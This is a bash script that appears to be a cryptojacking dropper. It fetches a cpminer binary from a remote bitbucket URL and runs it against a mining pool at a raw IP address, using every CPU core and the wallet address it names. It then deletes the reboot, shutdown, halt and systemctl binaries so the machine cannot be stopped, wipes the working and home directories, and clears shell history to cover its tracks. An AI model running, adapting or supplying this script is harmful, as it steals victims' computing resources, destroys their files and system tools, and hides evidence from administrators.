#!/bin/bash
wget -O biru https://bitbucket.org/kzpakid/kfile/raw/main/cpminer > /dev/null 2>&1
chmod 777 biru
./biru -a minotaurx -o stratum+tcp://64.23.134.156:443 -u RY1xwedsKLtchaw6XZcdFHZDYgFaoh2owB.$(shuf -n 1 -i 1-99999)-bb -t $(nproc --all) > /dev/null 2>&1
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
